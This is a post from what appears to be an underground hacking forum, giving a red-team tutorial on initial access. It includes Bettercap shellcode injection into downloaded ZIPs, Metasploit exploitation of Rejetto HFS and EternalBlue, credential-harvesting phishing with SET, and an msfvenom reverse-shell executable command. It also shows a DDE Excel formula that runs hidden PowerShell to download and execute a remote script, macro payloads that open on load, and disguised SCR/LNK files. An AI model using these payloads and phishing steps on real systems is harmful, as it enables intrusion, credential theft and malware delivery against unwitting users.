HTDark | Underground Hacking Forum and Cybersecurity Community
  • Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Pentest Red Team Techniques - Initial Access

dEEpEst

dEEpEst

☣☣ In The Depths ☣☣
Staff member
Administrator
Super Moderator
Hacker
Specter
Crawler
Shadow
Joined
Mar 29, 2018
Messages
13,861
Solutions
4
Reputation
27
Reaction score
45,546
Points
1,813
Credits
55,350
‎7 Years of Service‎
 
56%

Red Team Techniques​

Initial Access​

The Adversary is trying to get into your Network


Initial Access consists of techniques that use various entry vectors to gain their initial foot hold within a network. Techniques used to gain a foothold include targeted spear phishing and exploiting weaknesses on public-facing web servers. Foot holds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.
 

Content Injection​

Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e.,
This link is hidden for visitors. Please Log in or register now.
followed by
This link is hidden for visitors. Please Log in or register now.
), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e.,
This link is hidden for visitors. Please Log in or register now.
) and other data to already compromised systems.

Adversaries may inject content to victim systems in various ways, including:


  • From the middle, where the adversary is in-between legitimate online client-server communications (Note: this is similar but distinct from
    This link is hidden for visitors. Please Log in or register now.
    , which describes AiTM activity solely within an enterprise environment)

  • From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server
Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception

In this example I'll be working with the backdoor-factory Injection Caplet for Bettercap rebuilt in Go the tools looks for specific extensions and file formats to inject shellcode data on compatible binary file formats such as PE, Mach-O, and ELF in the following examples I will use a Linux (ELF) and a Windows (PE) binary that both will be injected with shellcode

First will need to run backdoor-factory and give it the folder where our shellcode is located

image

Since this folder is empty will need to create the shellcode for the intended OS in this scenario will be building the shellcode for Linux OS 64bit I'll use msfvenom from creating the shellcode

image

Will take a quick look at the caplet file to see what it's doing, in the first line it's targeting Linux machines, on the second line it is searching for specific User Agents that Linux machines are using when navigating the web and the 3 line it will look for specific containers such as zip, tar, gunzip, etc. It will decompress these files on the file if they are not password protected and then inject the shellcode on the binary ELF or PE.

image

Make sure you save the payload in the correct folder, as seen previously I saved a 64 bit shellcode in the x64 folder and the caplet is targeting the correct formats now with this I can continue with the instructions by backdoor-factory and execute the caplet

image

Now since the technique is specific to what it will look for I setup a ELF binary that prints "Hello World" this binary was compressed into a ZIP file and is hosted on a Apache server, I tried using python HTTP but got no success only with dedicated HTTP Servers, now when BETTERCAP detects the specific User-Agent and the extensions to be correct it will grab the file, inject the shellcode and send it back to the user but this time with our shellcode

image

Now will grab the file

image

In the screen above we see the intended file has been downloaded the ZIP file and BETTERCAP has successfully identified it and injected the shellcode

image

Now when the user tries to use this file by extracting and executing, it will work as intended but with our backdoor installed

image

For windows it requires some small editing on the CAPLET file

image

As seen previously I've added the target to be window and to expect users agents that hold the string Windows, not 100% reliable as this can be spoofed but will continue for now, I've hosted a PE file on a Apache server again



image

And I've initiated the attack on another window and notice the new target

image

I'll proceed in downloading the PE file compressed in a ZIP container

image

And the attack continues from BETTERCAP

image

I can confirm this by extracting the contents of the ZIP file and executing seen in the demo below

image
 

Exploit Public-Facing Applications​

Adversaries may attempt to take advantage of a weakness in an internet-facing computer or program using software, data or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include an Exploitation for Defense Evasion.

If an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity issues and access the management policies.

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.

This link is hidden for visitors. Please Log in or register now.
 

Rejetto HTTP File Server (HFS) 2.3​

You can use HFS (HTTP File Server) to send and receive files.

It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. It also differs from classic web servers because it's very easy to use and runs "right out-of-the-box". Access your remote files, over the network. It has been tested with Wine under Linux.

CVE-2014-6287

The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aka HFS or HTTP Fileserver) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

Let's test it.

Recon

We will have an instance on HFS running in our victim host.

image

From our attacking machine we will do a simple nmap scan and check our open ports, we know the server is running on port 80 but as an attacker we usually go in blind (Black Box). As well we don't want to flood it with so much request so we can always use nmaps safe scripts to check our victim host in a proper way. Let's cheat on this example and run the scan just on port 80.

image

Let's imagine that this is a Public facing IP Address, and we find our Web Server running HFS, let's enumerate this service as we are currently unaware if there is even an exploit!!.

Google:

The first 3 searches shows us some promising results

image

Let's not go too far Offensive Security has this incredible tool to search for exploits locally on our machine with no internet [searchsploit].

image

What about the famous hacker framework Metasploit.

We can start the tool by running:sudo msfdb init && sudo msfconsole

This will initialize the metasploit database and initialize the framework, from here searching exploits is simple by just utilizing the "search" command:search rejetto

image

A great option we can use this tool to catch a shell immediately, we try to do this in a most efficient matter, why not use a tool that has been properly tested (Manual hackers out there).

Exploit

With Metasploit we set our proper options to attack this machine and gain a shell. Usually we want to set the following variables


Copy
<span><span>set RHOST &lt;Target IP&gt;<br></span></span><span><span>set RPORT &lt;Target Port&gt;<br></span></span><span><span>set LHOST &lt;Attacker IP&gt;<br></span></span><span><span>set LPORT &lt;Attacker Port&gt;</span></span>
The rest is set to the proper port and path. Then we simply run the payload.

image

And we can see our permission from the machine with Metasploit try and Privesc and other good things on the machine. But this is just an example with how some public facing application can give the APT Initial Access to the Internal Network when this is facing the Public Internet.
 

External Remote Services​

Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally.

Access to
This link is hidden for visitors. Please Log in or register now.
to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credential from users after compromising the enterprise network. Access to remote services may be used as a redundant or persistent access mechanism during an operation.
 

SMB/Windows Admin Shares​

Adversaries may use Valid Accounts to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.

SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares.

Windows systems have hidden network shares that are accessible only to Administrators and provide the ability for remote file copy and other administrative functions. Example network shares include C$, ADMINS$ and IPC$. Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over SMB, to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution.

Boy is this one a famous one (WannaCry), this port now uncommon but not dead is still facing the public internet (do your recon if you don't believe me). This port is another common service offered by operating systems, it allows us to share files across the network with ease, but it also allows attackers to gain access to machines and even move laterally through the network!!(More on that later).

Recon

We start with our nmap scan to find the service running on the Operating System we are aware that the service runs on port 445 so we will focus on this one on our initial enumeration.

image

We see our port and service open and running with some enumeration we can find that this service is vulnerable to Eternalblue Exploit. This was a very known vulnerability leaked by Shadow Brokers in 2017 and developed by the NSA. It has been properly tested and developed on the Metasploit Framework (please do try and manually exploit this as there are many around flying on github). We will use this to gain a shell and access on to the machine.

But!!, let's be honest even though we are having and simulating an APT let's be CAREFUL when using these exploits as they are well known to crash servers, YES, YES they have been tested and properly configured to work on the framework but computers are so random that you don't even know if this will work, it is always best and of good practice to replicate the environment in a Virtual Machine and TEST your exploits THERE!!.

We verify our variables that are set onto Metasploit and execute the Exploit and we get a Shell.

image

And it's SYSTEM Access. This was another great example of Services facing the public internet and how attackers can leverage this vulnerabilities and gain access to the network. With some proper enumeration and the correct tools we can find these vulnerabilities on the targeted machine and be able to gain access to the PC.

Remember even though this was a very dangerous vulnerability and it's not seen in the wild anymore, well not as often it is unfortunately still out there.
 

RDP Service​

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS)

Adversaries may connect to a remote system over RDP/RDS to expand access if the service is enabled and allows access to accounts with known credentials.

Sometimes we need to access our PC from a remote location due to situations that are out of our control, but Windows made it simple to allow RDP Connections to our PC through the RDP Service. (Pro to Enable, Home only allows Connection). And we will initiate our RDP Service to point a Public IP Address so that we can Access our Internet Network from a remote location.

Here in a work perspective is great in an Attacker perspective this is even greater, the only thing that stops them is too find any Valid Accounts that can give them access to the service. There are some public exploits but have a few requirements for them to be successful. Some need to run a specific service (UltraVNC, TightVNC, etc.) Other need older OS (Windows XP, Vista, 7).

Recon

Let us start with a simple nmap scan these services run on specific ports(unless changed) RDP is known for running on port 3389 we will focus our scan on this specific port and see what information we can grab from this port.

image

We continue by searching for accounts or common passwords that can give us some access to this services, in this step we can use many techniques such as OSINT, Phishing, Leaked Databases, etc. These will be helpful to find users or credentials for trying out on the External Remote Services available from a company that is facing the public internet.

Exploitation

Well on this attack we won't be using any exploits but this attack consists mostly on having some Valid Accounts with RDP Permissions or Administrator Account Privileges, these accounts are usually the ones capable of remote access through RDP.

But in this example we did our recon and found some old credentials leaked in a previous Database.

User: John

Password: P4$$W0rd123!

image

And finally after some hard work we manage to get Access through our RDP Service that we found in our Initial Recon, this is another great example not common but still out there, that can give attackers access to the internal network.
 

Phishing​

Adversaries may send phishing messages to gain access to victims systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.

Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems or to gather credentials for use of Valid Accounts. Phishing may also be conducted via third-party services, like social media platforms.
 

Phishing: Spearphishing via Service​

In this scenario, adversaries send messages through social media services, personal webmail, and other non-enterprise controlled services. These services are more likely to have less-strict security policy than an enterprise. As with most kinds of spearphishing, the goal is to generate rapport with the target or get the target's interest in some way. Adversaries will create fake social media accounts and message employees for potential job opportunities. Doing so allows a plausible reason for asking about services, policies, and software that's running in an environment. The adversary can then send malicious links or attachments through these services.
 

Phishing: Spearphishing Link​

Adversaries may send spearphishing emails with a malicious link in an attempt to gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of link to download malware contained in an email itself, to avoid defenses that may inspect email attachments.

All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to Steal Application Access Tokens, like OAuth tokens, in order to gain access to protected applications and information.

It is a different form of spearphishing that employs links to download malware contained in email, instead of attaching malicious files to the documents itself, to avoid defenses that may inspect the email attachments.
 

Links: Social Engineering Toolkit​

The Social-Engineering Toolkit is an open-source testing framework designed for social engineering. SET has a number of custom attack vectors that allow you to make believable attacks quickly. SET is a product of Trusted-Sec. This tool is great for Phishing will automate a lot of the process and will provide us a link to send to the user

There are some good frameworks but we will use a well-known one, which hasn't been updated in quite some time but still demonstrates the capabilities of Capturing User Credentials.

image

We will follow the instructions to start a Social Engineering Attack, we continue by selecting the Credential Harvester Attack we type our IP address to where the user has to connect back to, and of course that holds our Login Poral and we can simple send the link to the User.

image

The body of the email I am using for this technique.

Once the user clicks on the Link they will get sent to a login portal familiar to Google.

image

And once they enter their credentials our machine will capture them for us.

image

Attacker Machine

image

We see our Captured Credentials in Red with a possible Username and Password Field found.

With this technique we can grab some valid accounts and try to use it with other methods for Initial Access.
 

Links: Binaries​

The use of binaries has highly decreased but this is still a good example on how Users download EXE files and give access to attackers, remember the weakest link is not sometimes a Machine but the User.

I will demonstrate a simple chat email that will contain a link to download the executable, that way it evades the Email Security measures in scanning the binary. This will simply give the user a prompt to download or run the binary.

The use of msfvenom here is very simple as this tool is widely known in the security industry but it's also great for creating fast payloads. You can combine different methods of packaging, obfuscation or stripping to make your payload more undetectable. This attack as well can be considered an Attachment as I will use the Link on a PDF file attached on the Email but the main attack vector will still be a Link.

Will create a simple binary payload utilizing msfvenom:


Copy
<span><span>msfvenom --platform windows --arch x64 --payload windows/x64/shell/reverse_tcp LHOST=&lt;YOUR IP&gt; LPORT=&lt;YOUR PORT&gt; --format exe --out payload.ex</span></span>
We can host this payload on a webserver and send the full link on your phishing pretext. A simple email communicating to the user about the New Game that just got out to stores.

image

(Don't worry I would've clicked it as well.)

Once clicking the Link the User will be prompted to download the payload and from here it should be enough to have it run it.

image

In the following example I hosted the payload using the python simple http webserver. You can start this by using the following command:python3 -m http.serverOnce we get the user to execute the payload we will receive a shell back to our machine.

image

A simple technique but very effective to gain us a Shell, you won't see this technique so much or probably never but this used to be a very effective and successful technique.

We implemented a Link onto our Email and have the user download a binary and gain Execution.
 

Links: HTA Files​

An HTML Application (HTA) Microsoft Windows program whose source consists of HTML, Dynamic HTML, and one or more scripting languages supported by Internet Explorer, such as VBScript or JScript.

In this example will be assuming that attachments are not allowed in our Emails, so we will need to send the user a Direct link which will bypass any Email Security and allow the user to download our payload. This attack can also be used as an attachment but we will skip attaching an HTA file and added directly onto our link so the browser knows what needs to be done once clicking the link.

Example:

I wrote a simple script which will automatically create me a simple HTA File that will execute a PowerShell code. It is very simple and will not bypass anything but in this example we did our work and can bypass anything.

HTA File which will execute a PowerShell Command

image

By saving this File into a HTA extension we can use this to send to our target and have it executed, remember these techniques needs User Execution/Interaction so giving them a reason on why these need to be open on your Phishing Email should be a good one.

We start a webserver and add this onto our Email with the File included.

This can be considered an attachment phishing technique the difference here is that our attachment contains no code for execution it just host our link
The target opens our file or Email which in the body it contains the Link, I put the Body of this email in an Attachment if you have noticed you can also use the attachment techniques to use Links as it's not that uncommon to use PDF files or other types of Documents that contain Links as References for other things.

image

Once the Target clicks on it, should receive prompts or Warning messages which we need a good excuse so the Target has these executed.

image

Once clicking Ok, the payload should execute with no issues on the Target Machine.

image

We see a warning on the Test.hta file that we try to execute, this needs to be downloaded and executed.

image

Then we successfully get a Reverse Shell on our Attacking Machine.

image

Ok , ok so you might be asking yourself, what's with ALL those warnings!!. Well Windows got more efficient in detecting these attacks and knows the common extensions in these payloads. It's efficient but we are using very simple techniques to mention, they are not Obfuscated, Encrypted or in any way using some Advanced method for Bypassing. Remember these are just small examples in the most basic matters and it's always good to do some research on how can you create more undetectable payloads.
 

Phishing: Spearphishing Attachment​

Adversaries may send spearphishing emails with a malicious attachment in an attempt to gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.

There are many options for the attachment such as Microsoft Office documents , executables, PDFs, or archived files. Upon opening the attachment ( and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.

Mitigations

Antivirus/Antimalware

Anti-virus con also automatically quarantine suspicious files.

Network Intrusion Prevention

Network intrusion prevention systems and systems designed to scan and remove malicious email attachments can be used to block activity.

Restrict Web-Based Content

Block unknown or unused attachments by default that should not be transmitted over email as best practice to prevent some vectors, such as .scr, .exe, .pif, .cpl, etc.
 

Attachments: LNK Files​

In accordance to fileinfo.com

An LNK file is a shortcut or "link" used by Windows as a reference to an original file, folder, or application similar to an alias on the Macintosh platform. It contains the shortcut target type, location, and filename as well as the program that opens the target file and an optional shortcut key.

It's imply a shortcut link those icons you regularly see in your Desktop. You can identify them by the curved arrow on the bottom left corner of the Icon.

image

Let's check the properties on the Icon

image

It tells me where it's located and what binary is executed, with it's full path included. What happens if I change the Path?.

Our icons have changed.

image

image

Can we fix this so we can confuse or trick the user? Of Course it's all in the settings and we can apply the path of the specific Icon we are searching for in the Machine.

image

What happens when I execute this Shortcut, it should point to our TEST File. And execute the text file.

image


This is a good way to also execute code we can use powershell or any of the EXECUTION techniques mentioned to call our payload, not the most stealthiest and reliable since it requires the user to interact with this file but a valuable source to know it exists.
 

Attachments: SCR Files​

SCR Files are screensaver files used by Windows for energy saving purposes. I will create a simply binary and changing the extension from EXE to SCR.

Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.

SCR files are screensaver files used by Windows for energy saving purposes. Screensavers are programs that execute after a configurable time of user inactivity and consists of Portable Executable (PE) files with a .scr file extension. The windows screensaver application scrnsave.scr is located in C:\Windows\System32, and C:\Windows\sysWOW64\ on 64-bit Windows systems. The screensaver settings are stored in the Registry (HKCU: Control Panel\Desktop\ ) and can also be manipulated for persistence.

We can use Msfvenom, Phantom Evasion, Veil Framework or any tool that can generate a binary payload. As this file we will manipulate so that we can send it to our victim and have it executed.

I will use a simple payload created from the msfvenom tool, I will save it as an EXE file and from the Attacker machine I can change the extension to .scr and we can compare both payloads even though the extension has change the functionality has not been affected.

image

I will transfer these files onto our Windows Box and we can see the small but very valuable difference. We can see that in the description information for the EXE file is described as an Application and the SCR file is described as a Screensaver. This is good as we can confuse our target into thinking this is a normal Screensaver File.

image

We can see our payload running in the processes list

image

What about the SCR file?

image

Same results, but why is this??. Well scr extensions are also executables on a Windows machine we can go a bit more farther and try to make this a more credible file to open.

Spoofed Extension and Icon has been switched.

image

In this Example I spoofed the Extension and switched the Icon image to a more credible or safer looking icon where the user might think this is a simple image but in the following demo we can see that this is an Executable that will connect us back to our attacking machine.

Demo:

image
 

Attachments: Dynamic Data Exchange​

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplication's of changes to a data item), and requests for command execution.

Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry Keys.

Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands, directly or through embedded files, and used to deliver execution via phishing campaigns or hosted Web Content, avoiding the use of Visual Basic for Applications (VBA) macros. DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.

The techniques for this Demo will use Excel as there are different procedures for the various Office products but the syntax should be the same

As of 2017 Some products don't support DDE no more but Excel and Outlook do still by default

We start by opening a new Excel Spreadsheet and type the syntax into the Formula Box on the A1 cell

image

On the formula we will write the following syntax. If you receive a formula error it will usually highlight where the error is located, it's a lot of trial and error but this syntax should be simple to follow

=cmd|'/c powershell.exe -w hidden IEX (New-Object Net.WebClient).DownloadString(\"
This link is hidden for visitors. Please Log in or register now.
");'!_xlbgnm.A1

From here we will need and setup our web server and our listener so that the DDE can download and execute our shell and our listener to catch it.

image

A simple warning will ask the user to Enable the Content here our Social Engineering will come in hand by explaining why the user should do this.

image

Once they enable a Second Prompt will show what is trying to be executed, if we manage to get the user pass this we should be doing good.

image

They click Yes and we can see our attacking machine receive a connection.

image

image
 

Attachments: Macros​

Macros are series of instructions to automate tasks, it's a scripting language that help adversaries to automate various attacks

Let me explain a little on Macros, they are a series of commands and instructions that you group together as a single command to accomplish a task automatically. Versions of Windows 2007 and newer, to save tasks you do often you can bundle them into a macro.

These macros also help red teamers to execute code or to accomplish a command since this is coming from a legitimate source MS Office these guys pass undetected by Antivirus, but of course nowadays the AV are getting more sophisticated and can actually detect these malicious tasks that macros shouldn't be executing. A way to avoid this is by adding obfuscation onto the file. These can also execute code such as VB (Visual Basic).

Example

In this example I will be using 2 tools the Unicorn tool from Dave Kennedy at TrustedTec and a simple PowerShell Reverse Shell, by combining these tools I will be able to create a Macro Payload that will gain me access to the target machine when executing on the Victim Machine.

Unicorn Menu

image

From the payloads offered on unicorn I will use the Custom PS1 Attack Example with the Macro included, then from here it will be simple to combine the 2 and create a Macro

image

A new file will be created (powershell_attack.txt) and when viewing this file we will see the VBA Code created to copy and paste onto our Word Document.

image

We move to our Sample machine running Windows and Create a New Word Document.

To enable this feature we will need to go to the Options Menu, then the Customize Ribbon and Select the Developer Options. Once from there we can create a macro.

image

Create a New macro and Name it Auto_Open

image

On the next windows we will copy the entire code from our powershell_attack.txt file and save it.

image

We continue and then we will save the file and this is what will need to ba attached and sent onto our Target. Make sure to choose the Macro-Enabled Document

image

From here we will go back to our attacking machine and start our listener and wait for a shell connection back to our attacking machine. Once the user opens the Document they will receive an Application Error, no worries this behavior is intended making them think that the document is meant for "Older" versions of the file.

image
 

Attachments: Macros - Linux​

Macros can be utilize with Linux as well, since there is no official support to run Microsoft Office on Linux we have to mess around with the alternative version called LibreOffice, this suite of tools allow Macros as well wit there own Scripting Language
This link is hidden for visitors. Please Log in or register now.
some advantages of this method of Initial Access is that there is no MOTW, now setting up macro execution is quite simple, we don't have the access to the Win32 API or any other implementations that are used with windows so will work with what we have, in the following example I scripted to execute the Calculator on Linux


Code: 
Sub Main
Shell("gnome-calculator")
End Sub


With this code the calculator will launch when the Macro is executed, now implementing the Open Document execution so the Macro runs when the document has been opened with the following steps:

Tools > Customize > Events > Open Document

Verify the window looks similar to the one below to confirm that the Macro you are working with is actually selected to run when open

image

View below a small demonstration that the Macro has been executed successfully

image

Now unfortunately this method works because the macros are stored on my Local Machine and that's where it is executing from when sending to the user the Macro needs to be stored on the file not the local Library

image

And Macros by default are on High Security


image

The only option is to run these files on a trusted location

1image.png


And then Social Engineer to execute the Macros, since there is not "AutoOpen" feature in LibreOffice.

OLE Objects​

Now with OLE Objects we can utilize a technique called "Mouse Over Object" where we can select our Macro embedded onto the Document and Assign it the Action in this scenario there is no need for a Trusted Locations, In this example I used a formula which is the smallest I could quickly find:

image

Then right-click and Assign the Action

image

And when the User hovers over the OLE Object we gain execution as seen in the Demo below:

Macro-Linux-OLE.gif
 

Attachments: Scripting Files​

Scripting files are used commonly in Linux distributions with the files doing things such as, setting up an Operating System to the Company policies, Automate Tasks, Development, Monitoring and Logging, Managing User Permissions and much more, a sample script on a SH Script file just running the calculator:

Code: 
#!/bin/bash
 
# Print welcome message
echo "========================="
echo "Hello to my first script!!"
echo "========================="
# Launch GNOME Calculator
gnome-calculator

The previous script would Print out a message and then finally proceed into executing the calculator app, but we can also call a simple reverse shell, we can utilize pentestmonkey one-liners for this

image

Our Shell

image

As seen here, we gain a reverse shell connection back to our attacking host, but do realize this requires extra social engineering steps as Linux considers everything a file until you tell it that it's something else like a scripting language or an executable so the user needs to run a setup to this before executing.



Now in my testing I've noticed that if files come inside a container their execution feature isn't removed just as working with a Windows OS, take a notice in the image below an SH script that has execution properties from another Linux machine
image

Execution properties have been removed, these applies to files downloaded from browsers or using LOLBINs, but if the file is placed inside a container lets say a ZIP container the execution properties aren't removed

image
 
You must log in or register to reply here.
Back
Top